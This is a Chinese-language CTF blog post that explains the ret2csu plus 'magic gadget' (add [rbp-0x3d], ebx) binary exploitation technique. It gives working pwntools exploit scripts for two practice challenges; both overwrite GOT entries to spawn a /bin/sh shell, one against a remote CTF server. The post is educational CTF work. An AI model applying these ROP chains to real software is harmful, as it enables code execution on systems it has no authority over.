
  <!DOCTYPE html>
  <html lang="zh-CN"  
    
      data-theme-mode="auto"
    
  >
  <head>
  
  <meta charset="utf-8">
  

  

  

  <script>window.REIMU_CONFIG = {};window.REIMU_CONFIG.icon_font = '4552607_0khxww3tj3q9';window.REIMU_CONFIG.clipboard_tips = {"success":"复制成功(*^▽^*)","fail":"复制失败 (ﾟ⊿ﾟ)ﾂ","copyright":{"enable":false,"count":100,"content":"本文版权：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！"}};window.REIMU_CONFIG.code_block = {"expand":true};window.REIMU_CONFIG.base = 'https://Khighl.github.io.git';</script>
  
  <title>
    Magic_gadget |
    
    Hexo
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  
  
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_0khxww3tj3q9.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
    
<link rel="stylesheet" href="/css/loader.css">

  
  
    <meta name="description" content="Magic Gadget 前言:我在最近两周接触到了这个技巧,在不断的学习中发现这个技巧的巧妙,运用之广,真的让人惊讶.帮我解决了此前的栈相关的两道难题,并在TGCTF中抢到only_gets的一血 普遍性:1._do_global_dtors_aux函数常见于编译后的二进制文件（尤其是 C&#x2F;C++ 程序），它与 全局对象析构 和 程序终止时的清理逻辑 相关.说明是这个函数普遍存在于二进">
<meta property="og:type" content="article">
<meta property="og:title" content="Magic_gadget">
<meta property="og:url" content="https://khighl.github.io.git/2025/04/15/magic/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Magic Gadget 前言:我在最近两周接触到了这个技巧,在不断的学习中发现这个技巧的巧妙,运用之广,真的让人惊讶.帮我解决了此前的栈相关的两道难题,并在TGCTF中抢到only_gets的一血 普遍性:1._do_global_dtors_aux函数常见于编译后的二进制文件（尤其是 C&#x2F;C++ 程序），它与 全局对象析构 和 程序终止时的清理逻辑 相关.说明是这个函数普遍存在于二进">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://khighl.github.io.git/images/csu1.png">
<meta property="og:image" content="https://khighl.github.io.git/images/csu2.png">
<meta property="og:image" content="https://khighl.github.io.git/images/magic.png">
<meta property="og:image" content="https://khighl.github.io.git/images/Mag.png">
<meta property="og:image" content="https://khighl.github.io.git/images/timu.png">
<meta property="og:image" content="https://khighl.github.io.git/images/system.png">
<meta property="og:image" content="https://khighl.github.io.git/images/system.png">
<meta property="og:image" content="https://khighl.github.io.git/images/shell.png">
<meta property="og:image" content="https://khighl.github.io.git/images/one.png">
<meta property="og:image" content="https://khighl.github.io.git/images/one.png">
<meta property="og:image" content="https://khighl.github.io.git/images/mls.png">
<meta property="article:published_time" content="2025-04-15T09:49:32.000Z">
<meta property="article:modified_time" content="2025-07-04T06:17:32.656Z">
<meta property="article:author" content="zer00ne">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://khighl.github.io.git/images/csu1.png">
  
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
  
  
  
  
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous"></script>

  
  
    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.1.0/dist/aos.css">

  
  
  
<meta name="generator" content="Hexo 7.3.0"></head>

  <body>
    
    
  <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi rotate">
        
          <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
            <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="var(--red-1, #ff5252)" />
            <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
           M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="var(--red-1, #ff5252)" />
          </svg>
        
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/">首页</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/archives">归档</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/about">关于</a>
        </span>
      
        <span class="main-nav-link-wrap">
          <div class="main-nav-icon icon rotate">
            &#xe62b;
          </div>
          <a class="main-nav-link" href="/friend">友链</a>
        </span>
      
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅" target="_blank"></a>
    
    
    
  </nav>
  
</div>
<header id="header">
  
    
      
        <picture>
          
        </picture>
        
          <img  fetchpriority="high" src="/images/banner.webp" alt="Magic_gadget">
        
      
    
  
  <div id="header-outer">
    <div id="header-title">
      
        
        
          <a href="/" id="logo">
            <h1 data-aos="slide-up">Magic_gadget</h1>
          </a>
        
      
      
        
        <h2 id="subtitle-wrap" data-aos="slide-down">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content"  class="sidebar-right" >
          <aside id="sidebar">
  
  
  
  <div class="sidebar-wrapper wrap-sticky">
    <div class="sidebar-wrap" data-aos="fade-up">
      
        
          <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Magic-Gadget"><span class="toc-number">1.</span> <span class="toc-text">Magic Gadget</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98"><span class="toc-number">2.</span> <span class="toc-text">例题</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98-1"><span class="toc-number">3.</span> <span class="toc-text">例题</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98-2"><span class="toc-number">4.</span> <span class="toc-text">例题</span></a></li></ol>
      
  </div>
</div>
</div>
          <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="zer00ne" class="lazyload">
  <div class="sidebar-author-name">zer00ne</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">14</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">6</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
    
  
</div>
</div>
        
      
      
        
          <div class="sidebar-btn-wrapper" style="position:static">
            <div class="sidebar-toc-btn current"></div>
            <div class="sidebar-common-btn"></div>
          </div>
        
      
    </div>
  </div>

  <div class="sidebar-widget">
  
  </div>
  
</aside>

          <section id="main"><article id="post-magic" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <span class="article-date-link" data-aos="zoom-in">
    <time datetime="2025-04-15T09:49:32.000Z" itemprop="datePublished">2025-04-15</time>
    <time style="display: none;" id="post-update-time">2025-07-04</time>
  </span>
</div>

      

    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
      
        <h1 id="Magic-Gadget"><a href="#Magic-Gadget" class="headerlink" title="Magic Gadget"></a>Magic Gadget</h1><ol>
<li><strong>前言:</strong><br>我在最近两周接触到了这个技巧,在不断的学习中发现这个技巧的巧妙,运用之广,真的让人惊讶.<br>帮我解决了此前的栈相关的两道难题,并在TGCTF中抢到only_gets的一血</li>
<li><strong>普遍性:</strong><br>1.<strong>_do_global_dtors_aux</strong>函数常见于编译后的二进制文件（尤其是 C&#x2F;C++ 程序），它与 全局对象析构 和 程序终止时的清理逻辑 相关.说明是这个函数<strong>普遍存在</strong>于二进制文件中<br>2.<strong>_libc_csu_init</strong> 作为初始化函数,普遍存在于二进制文件中</li>
<li><strong>原理</strong><br><strong>1.ret2csu:<strong>观察下列gadget,我将其分为csu1片段与cus2片段:<br><img src="/images/csu1.png" alt="csu1"><br>很明显我们可以操作这六个寄存器的值,虽然目前看起来r12-r15好像没什么用,但是结合csu2:<br><img src="/images/csu2.png" alt="csu2"><br>此时一切就清晰了:我们可以通过r12-r15操作调用的函数,前三个寄存器的值.而且假如rbx+1&#x3D;&#x3D;rbp,我们还可以继续通过rop控制执行流.<br>&emsp;&emsp;注意这里调用函数的形式为:<br><em>call [r12+rbx</em>8]*<br>&emsp;&emsp;对r12+8*rbx(通常rbx&#x3D;&#x3D;0)的值进行了解引用([]),所以如果想要调用目标函数.<br>&emsp;&emsp;我们应该控制r12为目标函数的got表,rbx&#x3D;&#x3D;0,那么此时rbp&#x3D;&#x3D;1.<br>&emsp;&emsp;r13,14,15为目标函数的第一,二,三个参数<br><strong>2.magic gadget:</strong><br><img src="/images/magic.png" alt="magic"><br>&emsp;&emsp;直接通过IDA查看,我们是看不到目标gadget的,magic_gadget的定位需要借助”pop rbp,ret;”这个gadget的定位:<br>&emsp;&emsp;address(magic)&#x3D;address(“pop rbp,ret;”)-1<br>&emsp;&emsp;在pwngdb,我们可以查看到这个magic_gadget:<br><img src="/images/Mag.png" alt="magic"><br>注意这个gadget,它将ebx的值加在了rbp-0x3d指向的空间,所以如果我们能控制ebx与rbp,我们就能在任意地址中进行偏移.<br><strong>3.综合利用:</strong><br>&emsp;&emsp;1.控制ebx与rbp可以通过cus1进行,偏移后的结果可以通过cus2调用<br>&emsp;&emsp;2.如果git表可写,我们甚至可以通过偏移直接修改任意got表内地址为system或one_gadget等函数而不需要泄露libc基地址<br>&emsp;&emsp;3.我们还可以在close(1)后将stdout指针内的值重定向到stderr或stdin,恢复回显<br>&emsp;&emsp;我在以下例题中简称这种技术为</strong>重定向</strong></li>
</ol>
<h1 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h1><p>ret2dlresolve:<br>这道题一直困扰了我很久,我在想如果我不用ret2dlresolve的板子,我是不是就无法解决这个题了:(<br>当我学会这种方法时我发现:完全可以取代 ret2dlresolve的板子<br><img src="/images/timu.png" alt="csu2"><br>我没有放题目链接主要是这道题没什么特殊的地方,大家完全可以自己写个poc验证一下,保护只有NX,还有几个可以利用的got表,存在溢出,但没有合适的gadgetret2dlresolve:<br>这道题一直困扰了我很久,我在想如果我不用ret2dlresolve的板子,我是不是就无法解决这个题了:(<br>当我学会这种方法时我发现:完全可以取代 ret2dlresolve的板子</p>
<ol>
<li>定位我们所需的magic gadget与csu gadget,这部按我开头写的就可以,非常简单1.定位我们所需的magic gadget与csu gadget,这部按我开头写的就可以,非常简单</li>
<li>第一次栈溢出攻击,对write.got进行重定向,注意除了libc要正确,一般重定位所需的偏移会是负数,但是我们的p64()不会自动整形溢出,所以要在结果上加上0x10000000000000000手动整形溢出</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">libc=ELF(<span class="string">&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">io=process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">csu1=<span class="number">0x40076A</span></span><br><span class="line">magic=<span class="number">0x4005E8</span></span><br><span class="line">csu2=<span class="number">0x400750</span></span><br><span class="line">bss=<span class="number">0x600800</span></span><br><span class="line">offset=<span class="number">0x10000000000000000</span>+libc.sym[<span class="string">&#x27;system&#x27;</span>]-libc.sym[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x78</span>+p64(csu1)+p64(offset)+p64(elf.got[<span class="string">&#x27;write&#x27;</span>]+<span class="number">0x3d</span>)+p64(<span class="number">0</span>)*<span class="number">4</span>+p64(magic)+p64(<span class="number">0x400607</span>)</span><br><span class="line">io.send(payload)</span><br></pre></td></tr></table></figure>

<hr>
<p>这次攻击使得write.got被写入system的地址<br><img src="/images/system.png" alt="got">这次攻击使得write.got被写入system的地址<br><img src="/images/system.png" alt="got"></p>
<ol start="3">
<li>返回show函数,进行第二次ret2csu攻击<br>将&#x2F;bin&#x2F;sh写入bss段,然后使用ret2csu的模板调用write(“&#x2F;bin&#x2F;sh”,0,0),此时write.got为system,我们便可以轻松获得shell</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">payload =<span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x78</span>+p64(<span class="number">0x400773</span>)+p64(<span class="number">0</span>)+p64(<span class="number">0x400771</span>)+p64(bss)*<span class="number">2</span>+p64(elf.plt[<span class="string">&#x27;read&#x27;</span>])+p64(<span class="number">0x400607</span>)</span><br><span class="line"><span class="comment">#gdb.attach(io)</span></span><br><span class="line">io.send(payload)</span><br><span class="line">pause()</span><br><span class="line">io.send(<span class="string">b&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line">pause()</span><br><span class="line">payload =<span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x78</span>+p64(<span class="number">0x400774</span>)+p64(csu1)+p64(<span class="number">0</span>)+p64(<span class="number">1</span>)+p64(elf.got[<span class="string">&#x27;write&#x27;</span>])+p64(bss)+p64(<span class="number">0</span>)*<span class="number">2</span>+p64(csu2)</span><br><span class="line">io.send(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p><img src="/images/shell.png" alt="shell">![shell]</p>
<h1 id="例题-1"><a href="#例题-1" class="headerlink" title="例题"></a>例题</h1><p>[广东强网杯 2021 个人决赛]hardof:<a target="_blank" rel="noopener" href="https://www.nssctf.cn/problem/833">nss靶场</a><br>这道题和上面很像很像,也是没有合适的gadget,只有两个got表,没有开pie保护<br>我觉得其实打法和上面一模一样,就贴个wp吧,大家可以试着自己打一下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#io=process(&#x27;./pwn&#x27;)</span></span><br><span class="line">io=remote(<span class="string">&quot;node4.anna.nssctf.cn&quot;</span>,<span class="number">28667</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">libc=ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">bug</span>():</span><br><span class="line">    gdb.attach(io)</span><br><span class="line">read_got=<span class="number">0x601020</span></span><br><span class="line">read_plt=<span class="number">0x400440</span></span><br><span class="line">got=<span class="number">0x601018</span><span class="comment">#syscall</span></span><br><span class="line">cus1=p64(<span class="number">0x4005DA</span>)<span class="comment">#pop</span></span><br><span class="line">cus2=p64(<span class="number">0x4005C0</span>)<span class="comment">#call</span></span><br><span class="line">magic=<span class="number">0x400518</span></span><br><span class="line">bss=<span class="number">0x601800</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;distance=&gt;&quot;</span>+<span class="built_in">str</span>(<span class="built_in">hex</span>(libc.sym[<span class="string">&#x27;system&#x27;</span>])))</span><br><span class="line">payload =<span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x48</span>+cus1+p64(<span class="number">0xFFFFFFFFFFF6AF40</span>)+p64(got+<span class="number">0x3d</span>)+p64(<span class="number">0</span>)*<span class="number">4</span>+p64(magic)+p64(<span class="number">0x400532</span>)</span><br><span class="line">io.send(payload)</span><br><span class="line"><span class="comment">#=================================</span></span><br><span class="line">payload =<span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x48</span>+cus1+p64(<span class="number">0</span>)+p64(<span class="number">1</span>)+p64(read_got)+p64(<span class="number">0</span>)+p64(bss)+p64(<span class="number">8</span>)+cus2+p64(<span class="number">0x400532</span>)</span><br><span class="line">pause()</span><br><span class="line">io.send(payload)</span><br><span class="line">pause()</span><br><span class="line">io.send(<span class="string">b&quot;/bin//sh&quot;</span>)</span><br><span class="line">pause()</span><br><span class="line">rdi=p64(<span class="number">0x00000000004005e3</span>)</span><br><span class="line">ret=p64(<span class="number">0x00000000004005e4</span>)</span><br><span class="line">payload=<span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x48</span>+ret+rdi+p64(bss)+p64(elf.plt[<span class="string">&#x27;alarm&#x27;</span>])</span><br><span class="line">io.send(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h1 id="例题-2"><a href="#例题-2" class="headerlink" title="例题"></a>例题</h1><p>[鹏城杯 2022]one: <a target="_blank" rel="noopener" href="https://www.nssctf.cn/problem/2423">nss靶场</a><br>这道题远程的libc我也没找到,大家本地打着玩一下就好,主要是理解学习这个手法</p>
<p><img src="/images/one.png" alt="function"></p>
<ol>
<li>这道题开起来沙箱,禁止我们拿shell,而且在返回前close(1),使得我们无法leak libc,更无法回显flag</li>
<li>那么我们的首要任务就是恢复回显</li>
<li><strong>stdout,stdin,stderr</strong>是三枚存在于bss上的指针,它们指向libc中的三个IO结构体,close,read,write等交互函数是通过这些指针对IO进行交互的,也就是说,如果close(1)后stdout指向的IO文件不再是_IO_2_1_stdout_而是_IO_2_1_stderr_,我们任然能在基于write的输出函数中获得回显,只是write的第一个参数必须设置为stderr代表的文件描述符”2”</li>
<li><em>IO_2_1_stdout_与_IO_2_1_stderr_位于libc中,具有固定的偏移,同时本题可以通过格式化字符串泄露pie,我们便可以将csu+magic的组合拳打在stdout上,将其内部重定向到_IO_2_1_stderr</em>,此时获得回显,然后普通地orw就好</li>
<li>我本来写好exp了,但是虚拟机爆炸导致文件全没了,但是我觉得通过上述题目你也能写出对应的脚本:)</li>
</ol>
<p><img src="/images/one.png" alt="function"></p>
<p>谢谢你的浏览(❤ ω ❤)<br><img src="/images/mls.png" alt="mls"></p>

      
    </div>
    <footer class="article-footer">
      
      
      
      
      
      
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li></ul>


    </footer>
  </div>
  
  <nav id="article-nav" data-aos="fade-up">
    
      
      <div class="article-nav-link-wrap article-nav-link-left">
        
          
          
            <img data-src="/covers/er.jpg" data-sizes="auto" alt="something_interesting" class="lazyload">
          
        
        <a href="/2025/04/15/01/"></a>
        <div class="article-nav-caption">前一篇</div>
        <h3 class="article-nav-title">
          
            something_interesting
          
        </h3>
      </div>
    
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        
        
          <img data-src="/covers/er.jpg" data-sizes="auto" alt="IoT 西湖论剑-linkone" class="lazyload">
        
      
      <a href="/2024/10/01/iot1/"></a>
      <div class="article-nav-caption">后一篇</div>
      <h3 class="article-nav-title">
        
          IoT 西湖论剑-linkone
        
      </h3>
    </div>
    
  </nav>


</article>










</section>
        </div>
        <footer id="footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    
    <div>
      <span class="icon-copyright"></span>
      
      
      
        2020-2025
      
      <span class="footer-info-sep rotate"></span>
      zer00ne
    </div>
    
      <div>
        基于&nbsp;<a href="https://hexo.io/" rel="noopener external nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener external nofollow noreferrer" target="_blank">Reimu</a>
      </div>
    
    
      <div>
        <span class="icon-brush"></span>
        31.3k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        02:16
      </div>
    
    
    
    
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">总访问量&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">总访客量&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
    
  </div>
</footer>

        
          <div class="sidebar-top">
            <div class="sidebar-top-taichi rotate"></div>
            <div class="arrow-up"></div>
          </div>
        
        <div id="mask" class="hide"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      
        <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Magic-Gadget"><span class="toc-number">1.</span> <span class="toc-text">Magic Gadget</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98"><span class="toc-number">2.</span> <span class="toc-text">例题</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98-1"><span class="toc-number">3.</span> <span class="toc-text">例题</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98-2"><span class="toc-number">4.</span> <span class="toc-text">例题</span></a></li></ol>
      
  </div>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="zer00ne" class="lazyload">
  <div class="sidebar-author-name">zer00ne</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">14</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">6</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
    
  
</div>
</div>
      
    
  </div>
  
    
      <div class="sidebar-btn-wrapper">
        <div class="sidebar-toc-btn current"></div>
        <div class="sidebar-common-btn"></div>
      </div>
    
  
</nav>

    </div>
    
    
    
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js" integrity="sha384-3gT&#x2F;vsepWkfz&#x2F;ff7PpWNUeMzeWoH3cDhm&#x2F;A8jM7ouoAK0&#x2F;fP&#x2F;9bcHHR5kHq2nf+e" crossorigin="anonymous"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js" integrity="sha384-J08i8An&#x2F;QeARD9ExYpvphB8BsyOj3Gh2TSh1aLINKO3L0cMSH2dN3E22zFoXEi0Q" crossorigin="anonymous"></script>





<script src="/js/script.js"></script>



  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>



<script src="/js/pjax_script.js" data-pjax></script>







  
<script src="https://npm.webcache.cn/mouse-firework@0.1.1/dist/index.umd.js" integrity="sha384-8LyaidD9GPxQQgLJO&#x2F;WRw&#x2F;O2h3BoNq&#x2F;ApI&#x2F;ecpvM6RsrCz2qP2ppBXUKihP4V&#x2F;2d" crossorigin="anonymous"></script>

  <script>
    window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["var(--red-1)","var(--red-2)","var(--red-3)","var(--red-4)"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["var(--red-0)"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>





  <script>
    function initLive2d() {
      live2d.init("https://fastly.jsdelivr.net/gh/D-Sketon/plugin-live2d/", {themeTipsPath: ""});
    }
  </script>
  
<script src="https://fastly.jsdelivr.net/gh/D-Sketon/plugin-live2d/js/live2d-autoload.js" onload="initLive2d &amp;&amp; initLive2d()" async></script>







<div id="lazy-script">
  <div>
    
      
      
      <script data-pjax>
        window.REIMU_POST = {
          author: "zer00ne",
          title: "Magic_gadget",
          url: "https://khighl.github.io.git/2025/04/15/magic/",
          excerpt: "",
          description: "",
